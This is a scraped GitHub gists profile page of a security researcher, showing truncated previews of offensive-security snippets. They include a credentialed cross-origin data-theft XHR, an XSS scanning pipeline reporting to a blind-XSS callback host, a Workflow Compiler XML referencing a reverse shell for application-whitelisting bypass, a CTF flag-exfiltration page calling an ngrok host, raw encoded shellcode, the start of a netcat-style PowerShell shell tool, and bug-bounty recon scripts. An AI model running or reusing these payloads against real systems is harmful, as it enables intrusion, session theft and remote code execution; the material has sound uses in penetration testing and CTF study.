I hereby claim:
- I am scumdestroy on github.
- I am scumdestroy (https://keybase.io/scumdestroy) on keybase.
- I have a public key ASASXW521FiI8a2jQtGEpj-qEwk8t5Z0zFJkzgeMmZ6hDAo
To claim this, I am signing this object:
Jann Moon scumdestroy
⛓️
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var xhr = new XMLHttpRequest(); | |
| xhr.onreadystatechange = function() { | |
| if(xhr.readyState === XMLHttpRequest.DONE && xhr.status === 200) { | |
| alert(xhr.responseText); | |
| } | |
| } | |
| http://xhr.open('GET', 'http://targetapp/api/v1/user', true); | |
| xhr.withCredentials = true; | |
| xhr.send(null); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #/bin/bash | |
| hakrawler -url "${1}" -plain -usewayback -wayback | grep "${1}" | grep "=" | egrep -iv ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff | |
| |woff2|ico|pdf|svg|txt|js)" | qsreplace -a | kxss | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*" | dalfox pipe -b https://scumde | |
| stroy.xss.ht |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/sh | |
| echo "\nTIME TO DROP OSBOMBS ON YOU, BOYEEEEEE\n»»————- ☠ ————-««\n"" | |
| echo "HERE COME DA ASSETS\n»»————- ☠ ————-««\n" | |
| assets | |
| cat "/root/.osmedeus/storages/$1/assets/*" | tee ~/opps/osmedeus-$1 | |
| echo "\n\n HTTP OK THEN \n»»————- ☠ ————-««\n" | |
| cat "/root/.osmedeus/storages/$1/http/*" | tee -a ~/opps/osmedeus-$1 |
scumdestroy
/ bypass-ps.txt
Created
March 4, 2022 01:37
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version="1.0" encoding="utf-8"?> | |
| <CompilerInput xmlns:i="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://schemas.datacontract.org/2004/07/Microsoft.Workflow.Compiler"> | |
| <files xmlns:d2p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays"> | |
| <d2p1:string>Rev.Shell</d2p1:string> | |
| </files> | |
| <parameters xmlns:d2p1="http://schemas.datacontract.org/2004/07/System.Workflow.ComponentModel.Compiler"> | |
| <assemblyNames xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" /> | |
| <compilerOptions i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" /> | |
| <coreAssemblyFileName xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler"></coreAssemblyFileName> | |
| <embeddedResources xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" /> |
scumdestroy
/ index.html
Created
February 8, 2022 20:59
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <script> | |
| var local_ip = '127.0.0.1:1337'; | |
| var url = "http://${local_ip}/api/entries/search?q=" | |
| var ngrok = '3b3b-2600-6c50-7b7f-4c50-e133-2ebe-33a2-360b.ngrok.io'; | |
| var flag = 'HTB{'; | |
| var char_list = '!@abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-' ; | |
| async function getChunck(char){ | |
| return new Promise((resolve, reject)=>{ |
scumdestroy
/ testing
Last active
June 27, 2021 12:03
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| \x48\x31\xc9\x48\x81\xe9\xc0\xff\xff\xff\x48\x8d\x05\xef\xff\xff\xff\x48\xbb\x25\x94\x3c\x53\x4e\xad\x35\xd2\x48\x31\x58\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4\xd9\xdc\xbf\xb7\xbe\x45\xf9\xd2\x25\x94\x7d\x02\x0f\xfd\x67\x9a\x14\x46\x59\x1b\xc5\xff\x55\x9a\xae\xc6\x24\x02\x18\xe5\xbe\x80\x05\xdc\xb7\x21\x1e\xe0\x04\x1b\x6d\x9b\x8b\x19\x04\xe5\x04\x12\x89\xa8\x5d\x2f\x4c\x81\x15\x93\xe4\x5d\x31\x12\x4f\x6c\xd7\x3f\x77\xd5\x6d\x1b\xc5\xff\x15\x59\x67\xa8\x74\x52\x9e\xcb\xb4\xaa\x3d\x9f\x3e\x5c\xcb\xdf\x35\xd2\x25\x1f\xbc\xdb\x4e\xad\x35\x9a\xa0\x54\x48\x34\x06\xac\xe5\x96\xae\xd4\x1c\x03\xc5\xe5\x2d\x9b\x24\x44\xdf\x05\x03\x9c\xfc\x9a\xda\x5d\x7d\xd8\x7a\x25\x7d\xd3\xf3\xdc\x0d\x93\x0f\x6c\xfc\xdf\x89\xd5\x3d\x92\x76\x4d\x40\x23\x69\x97\x70\x77\x46\xe8\x0c\x03\x50\x4c\x64\x17\xc5\xed\x11\x9b\x24\x44\x5a\x12\xc5\xa1\x7d\x96\xae\xd4\x20\x1a\x4f\x7d\x74\x59\x21\x1c\x7d\x0b\x0f\xf5\x6b\x9a\x24\x44\x65\x09\x0f\xf5\x74\x8b\x64\xce\x74\xd0\xa2\x8d\x74\x80\xda\x74\x64\x12\x17\xf7\x7d\x59\x37\x7d\x77\xac\xb1\x52\x68\x9b\x9b |
scumdestroy
/ mamacat.ps1
Created
June 7, 2021 01:51
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function mamacat | |
| { | |
| param( | |
| [alias("Client")][string]$c="", | |
| [alias("Listen")][switch]$l=$False, | |
| [alias("Port")][Parameter(Position=-1)][string]$p="", | |
| [alias("Execute")][string]$e="", | |
| [alias("ExecutePowershell")][switch]$ep=$False, | |
| [alias("Relay")][string]$r="", | |
| [alias("UDP")][switch]$u=$False, |
scumdestroy
/ pull-BugBounty-wildcards.sh
Created
February 11, 2021 15:37
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/sh | |
| curl -sL https://github.com/arkadiyt/bounty-targets-data/raw/master/data/bugcrowd_data.json | jq -r '.[].targets.in_scope[] | [.target, .type] | @tsv' | grep '^*' | awk '{print $1}' | sed 's/^\*\.//g'| tee bugcrowd-wildcards | |
| curl -sL https://github.com/arkadiyt/bounty-targets-data/raw/master/data/federacy_data.json | jq -r '.[].targets.in_scope[] | [.target, .type] | @tsv'| grep '^*' | awk '{print $1}' | sed 's/^\*\.//g'| tee federacy-wildcards | |
| curl -sL https://github.com/arkadiyt/bounty-targets-data/blob/master/data/hackerone_data.json?raw=true | jq -r '.[].targets.in_scope[] | [.asset_identifier, .asset_type] | @tsv' | grep '^*' | awk '{print $1}' | sed 's/^\*\.//g'| tee h1-wildcards | |
| curl -sL https://github.com/arkadiyt/bounty-targets-data/raw/master/data/intigriti_data.json | jq -r '.[].targets.in_scope[] | [.endpoint, .type] | @tsv' grep '^*' | awk '{print $1}' | sed 's/^\*\.//g'| tee intigriti-wildcards |
scumdestroy
/ poorGF.sh
Created
February 11, 2021 14:01
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/sh | |
| echo $1 | waybackurls > wayback-results | |
| cat wayback-results | grep "\.conf" | tee $1-poorGF | |
| cat wayback-results | grep "\.xml" | tee -a $1-poorGF | |
| cat wayback-results | grep "\.db" | tee -a $1-poorGF | |
| cat wayback-results | grep "\.log" | tee -a $1-poorGF | |
| cat wayback-results | grep "config" | tee -a $1-poorGF | |
| cat wayback-results | grep "env" | tee -a $1-poorGF |